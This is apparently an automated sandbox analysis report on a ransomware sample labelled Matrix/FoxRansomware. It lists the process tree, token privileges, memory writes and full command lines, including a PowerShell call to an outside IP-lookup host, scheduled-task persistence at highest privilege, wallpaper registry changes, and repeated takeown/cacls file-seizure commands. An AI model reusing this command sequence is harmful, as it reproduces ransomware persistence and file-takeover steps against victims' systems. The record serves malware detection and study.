Token: SeCreatePagefilePrivilege	6260	WMIC.exe
Token: SeBackupPrivilege	6260	WMIC.exe
Token: SeRestorePrivilege	6260	WMIC.exe
Token: SeShutdownPrivilege	6260	WMIC.exe
Token: SeDebugPrivilege	6260	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6260	WMIC.exe
Token: SeRemoteShutdownPrivilege	6260	WMIC.exe
Token: SeUndockPrivilege	6260	WMIC.exe
Token: SeManageVolumePrivilege	6260	WMIC.exe
Token: 33	6260	WMIC.exe
Token: 34	6260	WMIC.exe
Token: 35	6260	WMIC.exe
Token: 36	6260	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6260	WMIC.exe
Token: SeSecurityPrivilege	6260	WMIC.exe
Token: SeTakeOwnershipPrivilege	6260	WMIC.exe
Token: SeLoadDriverPrivilege	6260	WMIC.exe
Token: SeSystemProfilePrivilege	6260	WMIC.exe
Token: SeSystemtimePrivilege	6260	WMIC.exe
Token: SeProfSingleProcessPrivilege	6260	WMIC.exe
Token: SeIncBasePriorityPrivilege	6260	WMIC.exe
Token: SeCreatePagefilePrivilege	6260	WMIC.exe
Token: SeBackupPrivilege	6260	WMIC.exe
Token: SeRestorePrivilege	6260	WMIC.exe
Token: SeShutdownPrivilege	6260	WMIC.exe
Token: SeDebugPrivilege	6260	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6260	WMIC.exe
Token: SeRemoteShutdownPrivilege	6260	WMIC.exe
Token: SeUndockPrivilege	6260	WMIC.exe
Token: SeManageVolumePrivilege	6260	WMIC.exe
Token: 33	6260	WMIC.exe
Token: 34	6260	WMIC.exe
Token: 35	6260	WMIC.exe
Token: 36	6260	WMIC.exe
Token: SeTakeOwnershipPrivilege	6796	takeown.exe
Token: SeTakeOwnershipPrivilege	7136	takeown.exe
Token: SeTakeOwnershipPrivilege	1504	takeown.exe
Token: SeTakeOwnershipPrivilege	3780	takeown.exe
Token: SeTakeOwnershipPrivilege	5660	takeown.exe
Token: SeTakeOwnershipPrivilege	6960	takeown.exe
Token: SeTakeOwnershipPrivilege	3904	takeown.exe
Token: SeTakeOwnershipPrivilege	2164	takeown.exe
Token: SeTakeOwnershipPrivilege	6888	takeown.exe
Token: SeTakeOwnershipPrivilege	5484	takeown.exe
Token: SeTakeOwnershipPrivilege	7088	takeown.exe
Token: SeTakeOwnershipPrivilege	6640	takeown.exe
Token: SeTakeOwnershipPrivilege	3336	takeown.exe
Token: SeTakeOwnershipPrivilege	6912	takeown.exe
Token: SeTakeOwnershipPrivilege	5876	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 4228	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	87
PID 1116 wrote to memory of 4228	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	87
PID 1116 wrote to memory of 4228	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	87
PID 1116 wrote to memory of 696	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	89
PID 1116 wrote to memory of 696	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	89
PID 1116 wrote to memory of 696	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	89
PID 1116 wrote to memory of 4944	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	96
PID 1116 wrote to memory of 4944	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	96
PID 1116 wrote to memory of 4944	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	96
PID 4944 wrote to memory of 1604	4944	cmd.exe	98
PID 4944 wrote to memory of 1604	4944	cmd.exe	98
PID 4944 wrote to memory of 1604	4944	cmd.exe	98
PID 1116 wrote to memory of 1784	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	101
PID 1116 wrote to memory of 1784	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	101
PID 1116 wrote to memory of 1784	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	101
PID 1116 wrote to memory of 4216	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	102
PID 1116 wrote to memory of 4216	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	102
PID 1116 wrote to memory of 4216	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	102
PID 1784 wrote to memory of 2188	1784	cmd.exe	105
PID 1784 wrote to memory of 2188	1784	cmd.exe	105
PID 1784 wrote to memory of 2188	1784	cmd.exe	105
PID 4216 wrote to memory of 2900	4216	cmd.exe	106
PID 4216 wrote to memory of 2900	4216	cmd.exe	106
PID 4216 wrote to memory of 2900	4216	cmd.exe	106
PID 1784 wrote to memory of 4052	1784	cmd.exe	107
PID 1784 wrote to memory of 4052	1784	cmd.exe	107
PID 1784 wrote to memory of 4052	1784	cmd.exe	107
PID 1116 wrote to memory of 5768	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	109
PID 1116 wrote to memory of 5768	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	109
PID 1116 wrote to memory of 5768	1116	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	109
PID 2900 wrote to memory of 6804	2900	wscript.exe	111
PID 2900 wrote to memory of 6804	2900	wscript.exe	111
PID 2900 wrote to memory of 6804	2900	wscript.exe	111
PID 1784 wrote to memory of 6856	1784	cmd.exe	114
PID 1784 wrote to memory of 6856	1784	cmd.exe	114
PID 1784 wrote to memory of 6856	1784	cmd.exe	114
PID 6804 wrote to memory of 5932	6804	cmd.exe	115
PID 6804 wrote to memory of 5932	6804	cmd.exe	115
PID 6804 wrote to memory of 5932	6804	cmd.exe	115
PID 5768 wrote to memory of 3068	5768	cmd.exe	116
PID 5768 wrote to memory of 3068	5768	cmd.exe	116
PID 5768 wrote to memory of 3068	5768	cmd.exe	116
PID 5768 wrote to memory of 4944	5768	cmd.exe	117
PID 5768 wrote to memory of 4944	5768	cmd.exe	117
PID 5768 wrote to memory of 4944	5768	cmd.exe	117
PID 2900 wrote to memory of 5648	2900	wscript.exe	118
PID 2900 wrote to memory of 5648	2900	wscript.exe	118
PID 2900 wrote to memory of 5648	2900	wscript.exe	118
PID 5648 wrote to memory of 1592	5648	cmd.exe	120
PID 5648 wrote to memory of 1592	5648	cmd.exe	120
PID 5648 wrote to memory of 1592	5648	cmd.exe	120
PID 5768 wrote to memory of 6868	5768	cmd.exe	122
PID 5768 wrote to memory of 6868	5768	cmd.exe	122
PID 5768 wrote to memory of 6868	5768	cmd.exe	122
PID 6868 wrote to memory of 7016	6868	cmd.exe	123
PID 6868 wrote to memory of 7016	6868	cmd.exe	123
PID 6868 wrote to memory of 7016	6868	cmd.exe	123
PID 7016 wrote to memory of 4332	7016	3xoBcHMg.exe	124
PID 7016 wrote to memory of 4332	7016	3xoBcHMg.exe	124
PID 6352 wrote to memory of 6992	6352	cmd.exe	126
PID 6352 wrote to memory of 6992	6352	cmd.exe	126
PID 6352 wrote to memory of 6260	6352	cmd.exe	129
PID 6352 wrote to memory of 6260	6352	cmd.exe	129
PID 6352 wrote to memory of 5236	6352	cmd.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWL2GIAk.exe"
  2⤵
  PID:4228
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWL2GIAk.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWL2GIAk.exe" -n
  2⤵
  - Executes dropped EXE
  PID:696
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mK69Sbg1.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7dQr4YE9.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1784
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7dQr4YE9.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2188
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:6856
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\dWLMVW0c.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4216
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\dWLMVW0c.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\j9rq5s4Z.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:6804
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\j9rq5s4Z.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:5932
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5648
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6868
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:7016
    - - C:\Users\Admin\AppData\Local\Temp\3xoBcHMg64.exe
        
        3xoBcHMg.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:5944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:7028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    PID:5456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "store.db" -nobanner
    3⤵
    PID:6352
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:5408
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"
    3⤵
    PID:6684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:4060
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:60
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""
  2⤵
  PID:6004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C
    3⤵
    PID:6572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "AssemblyList_4_client.xml" -nobanner
    3⤵
    PID:6692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "AssemblyList_4_client.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:6388
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""
  2⤵
  PID:4216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:6852
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:5996
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:6980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:7136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:7148
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "behavior.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5412
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml""
  2⤵
  PID:6884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1932
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5696
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
  2⤵
  PID:5604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
    3⤵
    PID:5444
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:4204
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
  2⤵
  PID:280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
    3⤵
    PID:3520
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:4760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
  2⤵
  PID:5924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
    3⤵
    PID:5692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:4276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:5872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:6440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:5324
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      Executes dropped EXE
      PID:3036
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""
  2⤵
  PID:6068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
    3⤵
    PID:6756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "ActivitiesCache.db" -nobanner
    3⤵
    PID:5568
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "ActivitiesCache.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:5448
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6b937184-c42d-4ad3-967c-24370ffdf90d.1.etl""
  2⤵
  PID:6560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6b937184-c42d-4ad3-967c-24370ffdf90d.1.etl" /E /G Admin:F /C
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6b937184-c42d-4ad3-967c-24370ffdf90d.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MoUsoCoreWorker.6b937184-c42d-4ad3-967c-24370ffdf90d.1.etl" -nobanner
    3⤵
    PID:6376
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MoUsoCoreWorker.6b937184-c42d-4ad3-967c-24370ffdf90d.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:6240
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""
  2⤵
  PID:6896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"
    3⤵
